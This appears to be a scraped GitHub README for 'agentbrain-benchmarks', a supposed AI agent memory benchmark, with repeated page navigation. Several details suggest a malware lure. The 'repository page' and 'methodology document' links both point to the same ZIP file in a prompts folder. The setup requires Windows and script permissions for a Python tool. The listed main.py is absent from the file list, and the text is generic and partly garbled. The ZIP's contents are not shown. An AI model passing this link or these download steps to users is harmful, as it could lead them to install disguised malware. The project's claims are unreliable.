🧠 agentbrain-benchmarks - Measure agent memory and benchmark performance

This project provides tools to test and measure how well AI agents recall information. It tracks performance on the LongMemEval-M dataset. You can use these benchmarks to verify accuracy and test memory consistency. The system currently achieves 71.7 percent accuracy on the primary test set.

📋 Project Goals

Artificial intelligence agents often struggle to remember context over long sessions. This software provides a standardized way to check those memory gaps. By running these benchmarks, you can see how different configurations handle complex knowledge graphs and retrieval tasks. This repository contains the code needed to replicate existing studies on AI memory and agent performance.

💻 System Requirements

You need a Windows computer to run these benchmarks. Ensure your system meets the following specifications:

Operating System: Windows 10 or Windows 11.
Processor: A modern multi-core processor from Intel or AMD.
Memory: 8 gigabytes of RAM or more.
Storage: 2 gigabytes of free space for the evaluation files and environment.
Software: You must have Python installed. If you do not have it, the setup process will guide you.

📥 Getting Started

Follow these steps to set up the software on your computer.

Visit the repository page to download the software: https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip
Look for the green button labeled Code and select Download ZIP.
Save the file to your computer.
Extract the contents of the ZIP folder into a dedicated location, such as your Documents folder.

⚙️ Installation Process

Open your terminal or command prompt to finish the setup.

Open the folder where you extracted the files.
Hold the Shift key and right-click inside the folder.
Select Open PowerShell window here or Open in Terminal.
Type the command pip install -r requirements.txt and press Enter.
Wait for the process to finish. This installs the necessary components to run the benchmarks.

🚀 Running the Benchmarks

Once you finish the installation, you can start the evaluation process.

Return to the terminal window.
Type python main.py and press Enter.
The system will load the LongMemEval-M dataset.
Follow the prompts on your screen to select the specific agent model you wish to test.
The software will process the memory sequences and output the accuracy score.

📊 Understanding Results

The benchmark outputs a report at the end of the run. This report breaks down performance by memory type and retrieval success.

Total Accuracy: The percentage of questions the agent answered correctly.
Latency: The time the agent took to recall specific information.
Knowledge Graph Integrity: A measure of how well the agent maintained logical connections between data points.

If your score differs from the documented 71.7 percent, check your system inputs. Sometimes, different versions of the agent model produce vary slightly in their memory performance.

🔧 Frequently Asked Questions

What if the program stops during the benchmark? Check your internet connection. Some tests download small samples from the dataset during the first run.

How do I update the software? Delete your current folder and download the latest version from the link above. This ensures you use the most current benchmarks.

Can I use this for my own models? Yes. Place your model files in the models folder and update the configuration file in the main directory.

📂 Project Structure

data/: Contains the evaluation datasets.
models/: Stores the agent configurations.
results/: Saves your report files after a test.
main.py: The entry point for starting the benchmark application.
requirements.txt: Lists the software tools required to run the code.

📖 Additional Information

This project relies on established data standards. Reference the document at https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip for formal background on the methodology. The project uses version 3 of the evaluation suite. Use these tools to maintain consistency across your own research and testing cycles.

Focus on creating reproducible environments when testing agent memory. Minor changes to the random seed or the graph structure will change your results. Record these settings alongside your scores to ensure others can verify your work.

If you encounter errors during the file installation, ensure your user profile has permission to run scripts on your Windows machine. Most errors stem from path naming issues or existing installations of Python preventing new updates.

This repository supports the dream-cycle and RAG memory architectures. If your agent uses custom retrieval methods, you must wrap those functions in the interface provided in the base directory. This allows the benchmarking tool to bridge your model with the standard test suite.

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
docs		docs
prompts		prompts
results		results
.env.example		.env.example
.gitignore		.gitignore
CITATION.cff		CITATION.cff
LICENSE		LICENSE
README.md		README.md
baseline.py		baseline.py
config.py		config.py
download_data.py		download_data.py
download_parquet.py		download_parquet.py
evaluate.py		evaluate.py
ingest.py		ingest.py
query.py		query.py
requirements.txt		requirements.txt
run_benchmark.sh		run_benchmark.sh
run_full.py		run_full.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

🧠 agentbrain-benchmarks - Measure agent memory and benchmark performance

📋 Project Goals

💻 System Requirements

📥 Getting Started

⚙️ Installation Process

🚀 Running the Benchmarks

📊 Understanding Results

🔧 Frequently Asked Questions

📂 Project Structure

📖 Additional Information

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

🧠 agentbrain-benchmarks - Measure agent memory and benchmark performance

📋 Project Goals

💻 System Requirements

📥 Getting Started

⚙️ Installation Process

🚀 Running the Benchmarks

📊 Understanding Results

🔧 Frequently Asked Questions

📂 Project Structure

📖 Additional Information

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages